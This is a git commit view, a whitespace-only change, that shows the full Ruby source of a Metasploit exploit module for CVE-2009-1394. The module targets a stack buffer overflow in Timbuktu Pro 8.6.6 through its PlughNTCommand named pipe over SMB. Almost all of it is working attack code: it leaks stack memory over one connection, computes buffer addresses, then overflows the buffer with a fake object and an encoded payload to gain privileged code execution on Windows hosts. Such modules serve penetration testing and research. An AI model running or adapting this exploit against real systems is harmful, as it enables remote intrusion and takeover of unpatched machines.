fixup whitespace
git-svn-id: file:///home/svn/framework3/trunk@7804 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Joshua Drake
parent
d8a4926a22
commit
21cbb87fac
|
|
@ -1,171 +1,171 @@
|
||||||
##
|
##
|
||||||
# This file is part of the Metasploit Framework and may be subject to
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
# redistribution and commercial restrictions. Please see the Metasploit
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
# Framework web site for more information on licensing and terms of use.
|
# Framework web site for more information on licensing and terms of use.
|
||||||
# http://metasploit.com/framework/
|
# http://metasploit.com/framework/
|
||||||
##
|
##
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = GreatRanking
|
Rank = GreatRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::SMB
|
include Msf::Exploit::Remote::SMB
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow',
|
'Name' => 'Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6
|
This module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6
|
||||||
in a pretty novel way.
|
in a pretty novel way.
|
||||||
|
|
||||||
This exploit requires two connections. The first connection is used to leak stack data
|
This exploit requires two connections. The first connection is used to leak stack data
|
||||||
using the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying
|
using the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying
|
||||||
a large value for this argument it is possible to cause Timbuktu to reply to the initial
|
a large value for this argument it is possible to cause Timbuktu to reply to the initial
|
||||||
request with leaked stack data. Using this data allows for reliable exploitation of the
|
request with leaked stack data. Using this data allows for reliable exploitation of the
|
||||||
buffer overflow vulnerability.
|
buffer overflow vulnerability.
|
||||||
|
|
||||||
Props to Infamous41d for helping in finding this exploitation path.
|
Props to Infamous41d for helping in finding this exploitation path.
|
||||||
|
|
||||||
The second connection utilizes the data from the data leak to accurately exploit the stack
|
The second connection utilizes the data from the data leak to accurately exploit the stack
|
||||||
based buffer overflow vulnerability.
|
based buffer overflow vulnerability.
|
||||||
|
|
||||||
TODO:
|
TODO:
|
||||||
hdm suggested using meterpreter's migration capability and restarting the process for multishot
|
hdm suggested using meterpreter's migration capability and restarting the process for multishot
|
||||||
exploitation.
|
exploitation.
|
||||||
},
|
},
|
||||||
'Author' => [ 'bannedit' ],
|
'Author' => [ 'bannedit' ],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Version' => '$Revision$',
|
'Version' => '$Revision$',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
[ 'CVE', '2009-1394' ],
|
[ 'CVE', '2009-1394' ],
|
||||||
[ 'OSVDB', '55436' ],
|
[ 'OSVDB', '55436' ],
|
||||||
[ 'BID', '35496' ],
|
[ 'BID', '35496' ],
|
||||||
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=809' ],
|
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=809' ],
|
||||||
],
|
],
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
'EXITFUNC' => 'process',
|
'EXITFUNC' => 'process',
|
||||||
},
|
},
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'Space' => 2048,
|
'Space' => 2048,
|
||||||
},
|
},
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
# we use a memory leak technique to get the return address
|
# we use a memory leak technique to get the return address
|
||||||
# tested on Windows XP SP2/SP3 may require a bit more testing
|
# tested on Windows XP SP2/SP3 may require a bit more testing
|
||||||
[ 'Automatic Targeting',
|
[ 'Automatic Targeting',
|
||||||
{
|
{
|
||||||
# ntdll .data (a fairly reliable address)
|
# ntdll .data (a fairly reliable address)
|
||||||
# this address should be relatively stable across platforms/SPs
|
# this address should be relatively stable across platforms/SPs
|
||||||
'Writable' => 0x7C97B0B0 + 0x10 - 0xc
|
'Writable' => 0x7C97B0B0 + 0x10 - 0xc
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
],
|
],
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
'DisclosureDate' => 'Jun 25 2009',
|
'DisclosureDate' => 'Jun 25 2009',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0))
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
# we make two connections this code just wraps the process
|
# we make two connections this code just wraps the process
|
||||||
def smb_connection
|
def smb_connection
|
||||||
|
|
||||||
connect()
|
connect()
|
||||||
|
|
||||||
begin
|
begin
|
||||||
smb_login()
|
smb_login()
|
||||||
rescue ::Exception => e
|
rescue ::Exception => e
|
||||||
print_error("Error: #{e}")
|
print_error("Error: #{e}")
|
||||||
disconnect
|
disconnect
|
||||||
exit
|
exit
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Connecting to \\\\#{datastore['RHOST']}\\PlughNTCommand named pipe")
|
print_status("Connecting to \\\\#{datastore['RHOST']}\\PlughNTCommand named pipe")
|
||||||
|
|
||||||
begin
|
begin
|
||||||
pipe = simple.create_pipe('\\PlughNTCommand')
|
pipe = simple.create_pipe('\\PlughNTCommand')
|
||||||
rescue ::Exception => e
|
rescue ::Exception => e
|
||||||
print_error("Error: #{e}")
|
print_error("Error: #{e}")
|
||||||
disconnect
|
disconnect
|
||||||
exit
|
exit
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
fid = pipe.file_id
|
fid = pipe.file_id
|
||||||
trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
|
trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
|
||||||
|
|
||||||
return pipe
|
return pipe
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def mem_leak
|
def mem_leak
|
||||||
|
|
||||||
pipe = smb_connection()
|
pipe = smb_connection()
|
||||||
|
|
||||||
print_status("Constructing memory leak...")
|
print_status("Constructing memory leak...")
|
||||||
|
|
||||||
writable_addr = target['Writable']
|
writable_addr = target['Writable']
|
||||||
|
|
||||||
buf = make_nops(114)
|
buf = make_nops(114)
|
||||||
buf[0] = "3 " # specifies the command
|
buf[0] = "3 " # specifies the command
|
||||||
buf[94] = [writable_addr].pack('V') # this helps us by pass some checks in the code
|
buf[94] = [writable_addr].pack('V') # this helps us by pass some checks in the code
|
||||||
buf[98] = [writable_addr].pack('V')
|
buf[98] = [writable_addr].pack('V')
|
||||||
buf[110] = [0x1ff8].pack('V') # number of bytes to leak
|
buf[110] = [0x1ff8].pack('V') # number of bytes to leak
|
||||||
|
|
||||||
pipe.write(buf)
|
pipe.write(buf)
|
||||||
leaked = pipe.read()
|
leaked = pipe.read()
|
||||||
leaked << pipe.read()
|
leaked << pipe.read()
|
||||||
|
|
||||||
if (leaked.length < 0x1ff8)
|
if (leaked.length < 0x1ff8)
|
||||||
print_error("Error: we did not get back the expected amount of bytes. We got #{leaked.length} bytes")
|
print_error("Error: we did not get back the expected amount of bytes. We got #{leaked.length} bytes")
|
||||||
pipe.close
|
pipe.close
|
||||||
disconnect
|
disconnect
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
offset = 0x1d64
|
offset = 0x1d64
|
||||||
stackaddr = leaked[offset, 4].unpack('V')[0]
|
stackaddr = leaked[offset, 4].unpack('V')[0]
|
||||||
bufaddr = stackaddr - 0xcc8
|
bufaddr = stackaddr - 0xcc8
|
||||||
|
|
||||||
print_status "Stack address found: stack #{sprintf("0x%x", stackaddr)} buffer #{sprintf("0x%x", bufaddr)}"
|
print_status "Stack address found: stack #{sprintf("0x%x", stackaddr)} buffer #{sprintf("0x%x", bufaddr)}"
|
||||||
|
|
||||||
print_status("Closing connection...")
|
print_status("Closing connection...")
|
||||||
pipe.close
|
pipe.close
|
||||||
disconnect
|
disconnect
|
||||||
|
|
||||||
return stackaddr, bufaddr
|
return stackaddr, bufaddr
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
stackaddr, bufaddr = mem_leak()
|
stackaddr, bufaddr = mem_leak()
|
||||||
|
|
||||||
if (stackaddr.nil? || bufaddr.nil? ) # just to be on the safe side
|
if (stackaddr.nil? || bufaddr.nil? ) # just to be on the safe side
|
||||||
print_error("Error: memory leak failed")
|
print_error("Error: memory leak failed")
|
||||||
end
|
end
|
||||||
|
|
||||||
pipe = smb_connection()
|
pipe = smb_connection()
|
||||||
|
|
||||||
buf = make_nops(1280)
|
buf = make_nops(1280)
|
||||||
buf[0] = "3 "
|
buf[0] = "3 "
|
||||||
buf[94] = [bufaddr+272].pack('V') # create a fake object
|
buf[94] = [bufaddr+272].pack('V') # create a fake object
|
||||||
buf[99] = "\x00"
|
buf[99] = "\x00"
|
||||||
buf[256] = [bufaddr+256].pack('V')
|
buf[256] = [bufaddr+256].pack('V')
|
||||||
buf[260] = [bufaddr+288].pack('V')
|
buf[260] = [bufaddr+288].pack('V')
|
||||||
buf[272] = "\x00"
|
buf[272] = "\x00"
|
||||||
buf[512] = payload.encoded
|
buf[512] = payload.encoded
|
||||||
|
|
||||||
pipe.write(buf)
|
pipe.write(buf)
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue